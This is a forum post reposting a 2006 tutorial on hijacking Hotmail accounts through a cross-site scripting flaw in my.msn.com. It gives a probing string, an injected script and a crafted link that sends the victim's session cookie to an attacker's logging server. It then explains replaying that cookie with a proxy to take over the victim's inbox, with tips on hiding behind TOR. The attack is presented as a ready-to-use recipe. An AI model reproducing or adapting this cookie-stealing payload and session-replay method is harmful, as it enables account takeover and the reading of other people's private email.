Jump to content

a *fresh* (m$) live exploit


Recommended Posts

this 's been discovered by a 16 year old hollandish kid ...

origin: his site -> http://adriaangraas.feetback.nl/browse.php...ploits/hotmail/

Hacking Hotmail trough XSS

by Adriaan Graas

24 June 2006


That microsoft's code is not always secure, is very clear again with this XSS exploit. This is not the first XSS exploit that has been found, others have been found. If you are viewing this document offline, the newest version can be found here. I am Adriaan Graas, a student who is interested in internet security and web development. I am currently 16 years old, though that would not make the exploit less effective.

Please do not mail me for hacking your ex-girlfriends inbox. Get away moron.


The idea is simple. When u are logged-in into Hotmail, a cookie is created wich allows you access every time you are in it's domain. Since the cookie is not IP-bind (how is this possible? - microsoft) we are able to fake the cookie, when stolen. Then use it to login. This all does mean that we do not have to know the password or even the emailaddress of the victim. Trough XSS we can insert an piece of javascript code that will send the cookie to a webserver with an log script. This can be written in PHP, ASP, CGI practically anything you want. The cookie can be faked with Proxomitron.


This is like being, 50% based on - pure luck. Or you have an really awful amount of time to spend. Software is written for auto-searching XSS exploits. Dont use it - it is crap, clear thinking is enough.

When searching, keep these points in mind:

* The page where you are searching for must be in the domain, which is specified in the cookie. On the pages with 'Logout' buttons in Hotmail, you are using that cookie. I would recommend you adding some bookmark displaying your cookie, like java script:alert(document.cookie);.

* You can use practically use any browser, though i'd recommend Mozilla Firefox. It is stable, secure, and available on almost any OS. Use Opera or Internet Explorer - these are ok too - if you like them better. A good point of Opera is that it lets you manage your own cookies.

* If you want to be stealth, use TOR or a proxy. Though DNS Leaking is still dangerous.

Ok. It took me 4 to 5 hours to find three exploits. I will discuss one only.

After having a short look at the cookie, I decided to just start the search. Except for your security, no other preparations are needed. Focus yourself on URL's with GET variables - they are often vulnerable. And, when u opened up a new page, check if your cookie is still equal to hotmail's login page cookie. Start replacing a GET-variable in the url one by one. Reload the page and view the page source. Check in the source if there are also images or URL's which also contain GET variables, you might be able to exploit these. Is your replaced variable there, try to make it in a way that it ends valid html/javascript and can display you an error. Often special characters are escaped. An nice allround variabele is something like hya"'><)(ho.


The normal URL

http://my.msn.com/newmodule.armx?tok=TVJmH...amp;page=1& m=&col=1&tab=3

The test URL

http://my.msn.com/newmodule.armx?tok=TVJmH...p;page=1&m= hya"'><ho&col=1&tab=3

A ctrl+f in the source for hya gave the invalid input.

<input type="hidden" name="m" value="hya"'><ho" />

To alert the cookie, it needs to be like this. Fortunately special characters where not escaped.

<input type="hidden" name="m" value="hya"><script>alert(document.cookie)</script><br class="ho" />

The exploited URL

http://my.msn.com/newmodule.armx?tok=TVJmH...p;page=1&m= hya"><script>alert(document.cookie)</script><br class="ho&col=1&tab=3


I assume you have the knowledge to at least figure things out yourself, so I am not going to much in details. In the last examples the cookie was alerted by javascript. We need the cookie to be send to a webserver, and there it needs to be logged. I assume you know how to create an logging file. Replace my code by your file where needed. This is the edited URL so it sends the cookie to an webserver.

http://my.msn.com/newmodule.armx?tok=TVJmH...p;page=1&m= hya"><script>location.href='http://yourserver/logger.php?cookie= '%2Bescape(document.cookie)</script><br class="ho&col=1&tab=3

This is the link the victim should click. As soon as he clicks it, his cookie is being send to your server, resulting to be saved in your logfile. You can display some innocent error or redirect to an other page. Next, get Proxomitron. Configure your browser to use it. Fire up proxomitron, go to headers, and fill in the cookiedata from your logfile into a fake cookie header (there is one by default). Make sure you have checked the 'out' box. Go to http://my.msn.com/. The inbox of your victim is all yours. If this does not work immediately, a cookie is not made yet. Just go to http://my.msn.com/ again.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...